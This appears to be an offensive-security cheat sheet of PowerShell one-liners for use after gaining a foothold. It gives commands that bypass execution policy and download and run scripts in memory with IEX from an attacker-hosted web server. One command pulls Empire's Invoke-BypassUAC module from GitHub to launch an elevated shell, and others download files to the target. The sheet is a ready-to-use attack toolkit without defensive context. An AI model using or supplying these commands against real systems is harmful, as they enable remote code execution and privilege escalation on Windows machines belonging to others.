## Start up WebServer

#Run script in memory:
powershell.exe -exec Bypass -NoLogo -NoProfile -C "IEX((New-Object System.Net.WebClient).DownloadString('http://<LocalIPAddress>:<PORT>/<FILE>'))"

powershell.exe -exec Bypass -NoLogo -NoProfile -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

#In PowerShell:
IEX((New-Object System.Net.WebClient).DownloadString('http://<LocalIPAddress>:<PORT>/<FILE>'))

==========================================================================================================

#Download File:
powershell.exe -exec Bypass -NoLogo -NoProfile -C "(New-Object System.Net.WebClient).DownloadFile('http://<LocalIPAddress>:<PORT>/<FILE>', '<FileName')"

#In PowerShell:
(New-Object System.Net.WebClient).DownloadFile('http://<LocalIPAddress>:<PORT>/<FILE>', '<FILENAME>')


============================================================================================================